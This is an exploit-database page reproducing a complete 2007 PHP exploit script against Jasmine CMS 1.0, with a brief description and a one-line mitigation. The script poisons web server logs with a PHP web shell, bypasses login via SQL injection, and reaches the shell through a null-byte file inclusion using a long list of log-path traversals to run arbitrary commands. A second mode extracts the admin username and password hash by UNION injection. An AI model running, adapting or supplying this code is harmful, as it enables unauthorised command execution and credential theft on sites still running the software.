header-logo
Suggest Exploit
vendor:
Jasmine CMS
by:
Silentz
7.5
CVSS
HIGH
SQL Injection/Remote Code Execution
CWE
Product Name: Jasmine CMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit

This exploit allows for SQL Injection and Remote Code Execution in Jasmine CMS version 1.0. It can be used to retrieve the admin user and hash, as well as execute arbitrary commands on the target system.

Mitigation:

Update to a patched version of Jasmine CMS or apply the vendor's recommended security measures.
Source

Exploit-DB raw data:

#!/usr/bin/php -q -d short_open_tag=on
<?php

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

if ($argc<4) {
print "-------------------------------------------------------------------------\r\n";
print "        Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_jasmine.php [OPTION] [HOST] [PATH] ([COMMAND])\r\n\r\n";
print "[OPTION]  = 0 = Remote Code Execution\r\n";
print "            1 = SQL Injection (Admin user & hash retrieval)\r\n";
print "[HOST] 	  = Target server's hostname or ip address\r\n";
print "[PATH] 	  = Path where Jasmine is located\r\n";
print "[COMMAND] = Command to execute\r\n\r\n";
print "e.g. w4ck1ng_jasmine.php 0 victim.com /jasmine/ \"ls -lia\"\r\n";
print "     w4ck1ng_jasmine.php 1 victim.com /jasmine/\r\n";
print "-------------------------------------------------------------------------\r\n";
print "            		 http://www.w4ck1ng.com\r\n";
print "            		        ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
die;
}

//Props to rgod for the following functions

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$exploit = $argv[1];
$host = $argv[2];
$path = $argv[3];
$cmd  = $argv[4];
$cmd  = urlencode($cmd);
$port=80;
$proxy="";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

function head(){

	print "-------------------------------------------------------------------------\r\n";
	print "        Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit\r\n";
	print "-------------------------------------------------------------------------\r\n";
}

function footer(){

	print "-------------------------------------------------------------------------\r\n";
	print "            		 http://www.w4ck1ng.com\r\n";
	print "            		        ...Silentz\r\n";
	print "-------------------------------------------------------------------------\r\n";
}


if ($exploit==0){

head();

$code="<?php echo w4ckw4ck;error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}passthru(\$_GET[cmd]);die;?>";
$packet="GET " . $p . $code . " HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: " . $host . "\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacketii($packet);

$sql = "' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*";

$data="login_username=" . $sql;
$data.="&login_password=";
$data.="login=Login";
$packet ="POST " . $path . "login.php HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

if (strstr($html,"302 Found")){}
else{print "[-] Exploit Failed...\r\n"; footer(); exit();}
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];

$paths= array (
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;

$packet ="GET " . $path . "admin/plugin_manager.php?u=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
$packet.="Host: " . $host . "\r\n"; 
$packet.="Cookie: " . $cookie . "\r\n";
$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (strstr($html,"w4ckw4ck"))
    {
     $temp=explode("w4ckw4ck",$html);
        print $temp[1];
        footer(); exit;
    }
  }
}

if($exploit==1){

    $sql = "news.php?item=-999/**/UNION/**/SELECT/**/0,password,0,0,0,0,username/**/FROM/**/user/**/WHERE/**/id=1/*";
    $packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
    $packet.="Host: " . $host . "\r\n";
    $packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);

    $temp = explode("Posted by ",$html);
    $temp2 = explode("at ",$temp[1]);
    $username = $temp2[0];

    $temp = explode("<td class='main_table_title'>",$html);
    $temp2 = explode("</td>",$temp[1]);
    $password = $temp2[0];

    if($username && $password){
	
	head();
	print "[+] Admin User: " . $username . "\r\n";
    	print "[+] Admin Hash: " . $password . "\r\n";
	footer();

    }

	else{head(); print "[-] Exploit Failed...\r\n"; footer();}
}
?>

# milw0rm.com [2007-06-19]

Navigation

Suggest Exploit

Services By CQR